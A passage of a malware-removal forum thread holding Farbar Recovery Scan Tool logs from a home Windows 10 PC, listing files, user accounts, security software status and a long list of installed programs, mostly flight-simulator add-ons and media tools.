2016-09-03 11:06 - 2016-09-03 11:06 - 0189638 ____R () C:\Program Files\PaintDotNet.Strings.3.hi.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0146360 ____R () C:\Program Files\PaintDotNet.Strings.3.hu.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0145450 ____R () C:\Program Files\PaintDotNet.Strings.3.it.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0156109 ____R () C:\Program Files\PaintDotNet.Strings.3.JA.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0149217 ____R () C:\Program Files\PaintDotNet.Strings.3.KO.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0148057 ____R () C:\Program Files\PaintDotNet.Strings.3.lt.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0143678 ____R () C:\Program Files\PaintDotNet.Strings.3.nl.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0144619 ____R () C:\Program Files\PaintDotNet.Strings.3.pl.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0146572 ____R () C:\Program Files\PaintDotNet.Strings.3.PT-BR.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0146254 ____R () C:\Program Files\PaintDotNet.Strings.3.pt-PT.resources
2016-08-05 10:36 - 2016-08-05 10:36 - 0139694 ____R () C:\Program Files\PaintDotNet.Strings.3.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0172690 ____R () C:\Program Files\PaintDotNet.Strings.3.RU.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0143397 ____R () C:\Program Files\PaintDotNet.Strings.3.sv.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0136078 ____R () C:\Program Files\PaintDotNet.Strings.3.ZH-CN.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0138463 ____R () C:\Program Files\PaintDotNet.Strings.3.zh-TW.resources
2016-09-12 14:55 - 2016-09-12 14:55 - 0566480 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.SystemLayer.dll
2016-09-12 14:55 - 2016-09-12 14:55 - 1083600 _____ () C:\Program Files\PaintDotNet.SystemLayer.Native.x64.dll
2016-09-12 14:55 - 2016-09-12 14:55 - 0988368 _____ () C:\Program Files\PaintDotNet.SystemLayer.Native.x86.dll
2016-09-12 14:55 - 2016-09-12 14:55 - 0818688 ____C () C:\Program Files\PaintDotNet.SystemLayer.pdb
2016-09-12 14:54 - 2016-09-12 14:54 - 0014032 _____ (dotPDN LLC) C:\Program Files\PdnRepair.exe
2015-09-24 19:08 - 2015-09-24 19:08 - 0000235 _____ () C:\Program Files\PdnRepair.exe.config
2016-09-12 14:54 - 2016-09-12 14:54 - 0013824 ____C () C:\Program Files\PdnRepair.pdb
2016-09-12 14:55 - 2016-09-12 14:55 - 0029904 _____ (dotPDN LLC) C:\Program Files\SetupNgen.exe
2010-04-21 00:57 - 2010-04-21 00:57 - 0000254 _____ () C:\Program Files\SetupNgen.exe.config
2016-09-12 14:55 - 2016-09-12 14:55 - 0028160 ____C () C:\Program Files\SetupNgen.pdb
2016-09-12 14:54 - 2016-09-12 14:54 - 0105680 _____ () C:\Program Files\ShellExtension_x64.dll
2016-09-12 14:54 - 2016-09-12 14:54 - 0096976 _____ () C:\Program Files\ShellExtension_x86.dll
2016-09-12 14:54 - 2016-09-12 14:54 - 0015568 _____ (dotPDN LLC) C:\Program Files\UpdateMonitor.exe
2015-09-24 19:10 - 2015-09-24 19:10 - 0000235 _____ () C:\Program Files\UpdateMonitor.exe.config
2016-09-12 14:54 - 2016-09-12 14:54 - 0013824 ____C () C:\Program Files\UpdateMonitor.pdb
2016-08-13 15:13 - 2016-08-13 15:35 - 0032854 _____ () C:\Users\Kyle Aniel\AppData\Roaming\net.telestream.wirecast.xml
2016-10-07 21:17 - 2016-10-07 21:18 - 305520897 _____ () C:\Users\Kyle Aniel\AppData\Local\ACCCx3_8_0_310.zip.aamdownload
2016-10-07 21:17 - 2016-10-07 21:18 - 0003413 _____ () C:\Users\Kyle Aniel\AppData\Local\ACCCx3_8_0_310.zip.aamdownload.aamd
2015-05-16 20:31 - 2016-07-03 21:04 - 0003584 _____ () C:\Users\Kyle Aniel\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2016-08-28 19:53 - 2016-08-28 19:53 - 0001542 _____ () C:\Users\Kyle Aniel\AppData\Local\recently-used.xbel
2014-12-17 21:28 - 2015-01-12 21:53 - 0007601 _____ () C:\Users\Kyle Aniel\AppData\Local\Resmon.ResmonCfg
2016-07-28 20:14 - 2016-07-28 20:14 - 0000028 _____ () C:\Users\Kyle Aniel\AppData\Local\X-Plane Installer.prf
2016-07-28 20:14 - 2016-07-28 20:32 - 0000015 _____ () C:\Users\Kyle Aniel\AppData\Local\X-Plane_drm.prf
2016-07-28 19:14 - 2016-07-28 19:14 - 0000041 _____ () C:\Users\Kyle Aniel\AppData\Local\x-plane_install_10.txt
2014-12-12 16:48 - 2014-12-12 16:48 - 0000057 _____ () C:\ProgramData\Ament.ini
2015-12-05 11:28 - 2015-12-05 11:28 - 0000016 _____ () C:\ProgramData\mntemp
2015-12-05 11:28 - 2015-12-05 11:28 - 0004133 _____ () C:\ProgramData\rxsmznjf.zcp
2016-02-06 15:35 - 2016-02-06 15:35 - 0004865 _____ () C:\ProgramData\smxrsjou.kmd

Files to move or delete:
====================
C:\Users\Kyle Aniel\fs9.exe
C:\Users\Kyle Aniel\MetricCollection.dll


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


ATTENTION: ==> Could not access BCD. The user is not administrator

==================== End of FRST.txt ============================

Link to post
Share on other sites

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Kyle Aniel (19-10-2016 14:57:04)
Running from C:\Users\Kyle Aniel\Downloads
Windows 10 Home Version 1607 (X64) (2016-09-16 12:11:12)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-23814709-2432651133-2868963390-500 - Administrator - Disabled)
banie_000 (S-1-5-21-23814709-2432651133-2868963390-1010 - Administrator - Enabled) => C:\Users\banie_000
DefaultAccount (S-1-5-21-23814709-2432651133-2868963390-503 - Limited - Disabled)
Guest (S-1-5-21-23814709-2432651133-2868963390-501 - Limited - Disabled) => C:\Users\Guest
Izach Aniel (S-1-5-21-23814709-2432651133-2868963390-1002 - Limited - Enabled) => C:\Users\Izach Aniel
Kyle Aniel (S-1-5-21-23814709-2432651133-2868963390-1001 - Limited - Enabled) => C:\Users\Kyle Aniel

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

777 Captain (777-200) 1.1 (HKLM-x32\...\x772) (Version: 1.1.00 - © 1999-2013 Captain Sim)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.020.20039 - Adobe Systems Incorporated)
Adobe After Effects CC 2015 (HKLM-x32\...\{147EC100-14BE-45EF-AB42-35BAEE7D02F0}) (Version: 13.5.0 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.185 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.8.158 - Adobe Systems, Inc.)
Aerosoft's - Airbus A320-A321 - FSX (HKLM-x32\...\Airbus A320-A321 - FSX) (Version: 1.30 - Aerosoft)
Airport Design Editor 170 (HKLM-x32\...\{FACD7476-0E32-4A35-9741-1049BE879267}) (Version: 1.70.6029.0 - ScruffyDuck Software)
Apple Application Support (32-bit) (HKLM-x32\...\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Audacity 2.1.1 (HKLM-x32\...\Audacity®_is1) (Version: 2.1.1 - Audacity Team)
Auto Clicker v2.2 (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\{C0A7E4F3-82CC-416B-82C6-BA06AACFD635}_is1) (Version: 2.2 - MurGee.com)
Autodesk Application Manager (HKLM-x32\...\Autodesk Application Manager) (Version: 4.0.69.0 - Autodesk)
Autodesk Download Manager (HKLM-x32\...\{C897D9EC-13C6-4A22-ABF7-33F2126A7DB6}) (Version: 3.0.8.0 - Autodesk, Inc.)
AV Voice Changer Software Diamond 9.0 (HKLM-x32\...\AV Voice Changer Software Diamond 9.0) (Version: 9.0.30 - AVSOFT Corp.)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.911.151222 - )
B787 for FSX (HKLM-x32\...\InstallShield_{04241DC8-98A4-41AC-A419-E23D6B401AA0}) (Version: 1.00.0000 - AeroSim Co.,Ltd.)
B787 for FSX (x32 Version: 1.00.0000 - AeroSim Co.,Ltd.) Hidden
Bandicam (HKLM-x32\...\Bandicam) (Version: 2.4.1.903 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Blender (HKLM\...\{70DFC1C6-C234-4B4D-87C1-E01793AAB130}) (Version: 2.78.0 - Blender Foundation)
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.5.61.6289 - BlueStack Systems, Inc.)
Boeing 767-300 twelve repaints FSX & P3D (HKLM\...\{D2A24725-5F68-49B2-BF2F-07360D885699}) (Version: 1 - SkySpirit2010, Thomas Ruth, Emil Serafino)
Boeing B737-823 Advanced VC FSX & P3D (HKLM\...\{330F6375-B0DB-4CDD-B1EB-B83C43810D11}) (Version: 1 - Project OpenSky, Alejandro Rojas Lucenda, FSRepaintsGER, Adam Murphy)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Camtasia Studio 8 (HKLM-x32\...\{AF33D0D2-2627-4AC8-8473-FDBB7892129C}) (Version: 8.6.0.2079 - TechSmith Corporation)
CaptainSim 757-200 PRO 4.2 (HKLM-x32\...\{5B57D4F1-66BA-448C-97F1-23F73517C694}_is1) (Version:  - komu)
CASecureBrowser (HKLM-x32\...\{FA3C5DAC-79B6-493B-9613-0FF5760AAEE5}) (Version: 8.0.0 - AIR)
CCleaner (HKLM\...\CCleaner) (Version: 5.12 - Piriform)
Chrome Remote Desktop Host (HKLM-x32\...\{159AA592-31AA-4EAC-A6CB-B47AB2CB1476}) (Version: 52.0.2743.48 - Google Inc.)
Convert AVI to MP4 (HKLM-x32\...\{9ECE13D2-C028-44CB-8A96-A65196E7BBE7}_is1) (Version:  - convertavitomp4.com)
CoolSoft VirtualMIDISynth 1.15.2 (HKLM-x32\...\CoolSoft VirtualMIDISynth) (Version: 1.15.2.0 - CoolSoft)
Cyberlink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.3.5715 - CyberLink Corp.)
Cyberlink PhotoDirector (Version: 5.0.3.5715 - CyberLink Corp.) Hidden
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.7.4016 - CyberLink Corp.)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.4.4223 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.4.4218 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.4.0.0192 - Disc Soft Ltd)
Debut Video Capture Software (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Debut) (Version: 3.01 - NCH Software)
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
DiscAuthor (x32 Version: 9.3.00 - Sony Corporation) Hidden
EditVoicepack X (HKLM-x32\...\{493687F8-8D57-47C4-87B6-D46D7C5203BF}) (Version: 4.0.7 - Bevelstone Production)
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Evernote v. 5.3 (HKLM-x32\...\{E461B1AC-BC3C-11E3-B5B8-00163E98E7D6}) (Version: 5.3.0.3360 - Evernote Corp.)
Express Burn Disc Burning Software (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\ExpressBurn) (Version: 5.06 - NCH Software)
EZdok Camera for Microsoft Flight Simulator X (HKLM-x32\...\EZdok Camera for Microsoft Flight Simulator X) (Version:  - )
f.lux (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Flux) (Version:  - )
Family Protection (HKLM-x32\...\{08DE682A-3858-4591-9EBB-E5290E4DC3DD}) (Version: 2.6.116.1 - McAfee, Inc.)
Flight Simulator First Officer version 2.3 (HKLM-x32\...\{AF5E7C31-99DF-4218-8E52-F1B3FE3FD9A3}_is1) (Version: 2.3 - Flight Simulator Addons)
Free Video Compressor (HKLM-x32\...\{01554C33-4131-4BC7-9E6D-AF85E02BDF4F}_is1) (Version:  - freevideocompressor.com)
FS Recorder 2.1  for FSX (HKLM-x32\...\{EB74294F-B8FC-4387-BEBF-275E36C6076C}) (Version: 2.1.0.0 - Matthias Neusinger)
FS Water Configurator 3.15 (HKLM\...\FS Water Configurator) (Version:  - )
FSDreamTeam GSX FSX (HKLM-x32\...\FSDreamTeam GSX FSX_is1) (Version: 1.8.4 - VIRTUALI s.a.s.)
FSDreamTeam Los Angeles International FSX (HKLM-x32\...\FSDreamTeam Los Angeles International FSX_is1) (Version: 1.6.0 - VIRTUALI Sagl)
FSFO version 2.0 (HKLM-x32\...\{64C6044E-CA51-47FF-99D7-A175399334CF}_is1) (Version: 2.0 - Flight Simulator Addons)
FSX FSND MD 83 version 2 (HKLM-x32\...\FSX FSND MD 83 version 2) (Version:  - )
FSX Mission Editor (HKLM-x32\...\{DF5EC16F-6C64-45F8-A6E5-6D5D1F6DB0CA}) (Version: 1.0.3824 - FSAddon)
GIMP 2.8.18 (HKLM\...\GIMP-2_is1) (Version: 2.8.18 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 53.0.2785.143 - Google Inc.)
Google Earth (HKLM-x32\...\{2C44ABB9-8621-4EF5-AF34-0886DCDA7C21}) (Version: 7.1.7.2600 - Google)
Google Earth Plug-in (HKLM-x32\...\{57BB4801-61C8-4E74-9672-2160728A461E}) (Version: 7.1.5.1557 - Google)
Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 5.41.3.0 - Google)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Gramblr (HKLM\...\Gramblr) (Version: 2.7.9 - Gramblr Team)
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HitFilm 4 Express (HKLM\...\{B266DF92-432D-4985-91C3-70148568AB79}) (Version: 4.0.5422.10801 - FXHOME)
Hoyle Puzzle and Board Games Classic (HKLM-x32\...\Hoyle Puzzle and Board Games Classic) (Version:  - )
HP 3D DriveGuard (HKLM-x32\...\{13133E99-B0D5-4143-B832-AAD55C62A41C}) (Version: 6.0.19.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{ADE2F6A7-E7BD-4955-BD66-30903B223DDF}) (Version: 2.20.41 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{3C7B723A-1108-455C-B65B-FF2251E1E5A3}) (Version: 1.1.0.0 - Hewlett-Packard)
HP ENVY 7640 series Basic Device Software (HKLM\...\{24BF3898-2667-4645-9448-8C6765B801A5}) (Version: 34.2.117.50647 - Hewlett-Packard Co.)
HP ENVY 7640 series Help (HKLM-x32\...\{5845A5C9-AA03-4D91-9793-1A2563CE0129}) (Version: 34.0.0 - Hewlett Packard)
HP ePrint (HKLM-x32\...\{2794875B-6CCF-48B8-84A5-5B10DB98BEE6}) (Version: 14.0.14176.1823 - Hewlett-Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7745.4851 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{7FE016CC-DAA9-4E21-BD2F-98390D1E6F3F}) (Version: 7.6.23.8 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)
HP System Event Utility (HKLM-x32\...\{8B4EE87E-6D40-4C91-B5E8-0DC77DC412F1}) (Version: 1.4.1 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HP Utility Center (HKLM\...\{DCD5C599-5CCC-4E37-8938-FBB548D780C6}) (Version: 2.5.3 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
iCloud (HKLM\...\{4B48E22A-2FB0-4EFA-B99E-954B1E50CD69}) (Version: 5.1.0.34 - Apple Inc.)
IcoFX 2.12 (HKLM-x32\...\IcoFX 2_is1) (Version: 2.12 - )
iFly Jets - The 737NG for FS2004 (HKLM-x32\...\iFly Jets - The 737NG for FS2004) (Version:  - )
iFly Jets - The 737NG for FSX (HKLM-x32\...\iFly Jets - The 737NG for FSX) (Version:  - )
iFunbox (v3.0.3109.1352) (HKLM-x32\...\iFunbox_is1) (Version: v3.0.3109.1352 - iFunbox DevTeam)
IHA_MessageCenter (HKLM-x32\...\{35AC3CFF-8021-4804-9967-4919A663128D}) (Version: 2.0.68 - Verizon)
Inst5675 (Version: 8.01.11 - Softex Inc.) Hidden
Inst5676 (Version: 8.01.11 - Softex Inc.) Hidden
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel(R) PRO/Wireless Driver (HKLM\...\{ac7ad2d7-04b3-460c-b370-07e3d3e3aa4e}) (Version: 17.01.0000.1697 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4360 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.9.1000 - Intel Corporation)
Intel(R) Smart Connect Technology (HKLM\...\{51AC86D3-C431-48AD-9195-0D6C930D07CD}) (Version: 4.2.41.2710 - Intel Corporation)
Intel(R) Virtual Buttons (HKLM-x32\...\1992736F-C90A-481C-B21B-EE34CAD07387) (Version: 1.0.0.14 - Intel Corporation)
Intel(R) Wireless Bluetooth(R) 4.0 (HKLM-x32\...\{C9324B6F-FC2B-4CA0-8C42-793D7099BDA1}) (Version: 17.0.1422.02 - Intel Corporation)
iTunes (HKLM\...\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
Java 8 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation)
Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Jed's Half-Life Model Viewer 1.3.6 (HKLM-x32\...\Jed's Half-Life Model Viewer) (Version: 1.3.6 - wunderboy.org)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Just Flight - 757 Jetliner - American Airlines (New) Livery Pack (HKLM-x32\...\{17F122A7-2F9B-4794-91F8-DF0FB253E74F}) (Version: 1.00.000 - Just Flight)
Just Flight - 757 Jetliner Freemium (HKLM-x32\...\{B0F7B3B5-E856-4558-BD7C-BDA32943C783}) (Version: 1.00.000 - Just Flight)
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version:  - )
Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)
LiveWeb (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\{F0A7B33E-C872-42C8-B1A9-55450809DAFF}) (Version: 4.00 - Shyam Pillai)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
McAfee Virtual Technician (HKLM-x32\...\McAfee Virtual Technician) (Version: 7.6.0.202 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.279 - McAfee, Inc.)
McDonnell Douglas DC-10 Version 2 FSX & P3D (HKLM\...\{0D9F34DB-535D-4FA2-B622-D03B6F479EBE}) (Version: 1 - Thomas Ruth and Erick Cantu, sounds by Dennis Vormberge)
MergeModule_x86 (x32 Version: 9.3.00 - Sony Corporation) Hidden
Microsoft Expression Encoder 4 (HKLM-x32\...\Encoder_4.0.1651.0) (Version: 4.0.1651.0 - Microsoft Corporation)
Microsoft Expression Encoder 4 Screen Capture Codec (HKLM-x32\...\{952DCCD8-4039-46C8-BC8B-5C1EB6C8E130}) (Version: 4.0.1651.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation)
Microsoft Flight Simulator X Service Pack 2 (HKLM-x32\...\{4847BBB9-EADD-4C92-90BF-4223B0892FF6}) (Version: 10.0.61472.0 - Microsoft Game Studios)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation)
Microsoft Office Home and Student 2016 - en-us (HKLM\...\HomeStudentRetail - en-us) (Version: 16.0.7369.2038 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MidiEditor (HKLM-x32\...\D4338446-FFE6-1A12-ACFF-CB6F6A6A70A1) (Version: 3.0.0 - Markus Schwenk)
Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.1.0 - Movavi)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2 - Mozilla)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MultitrackStudio Lite 8.1.3 (64-bit) (HKLM\...\MultitrackStudio64_is1) (Version:  - Bremmers Audio Design)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7369.2038 - Microsoft Corporation) Hidden
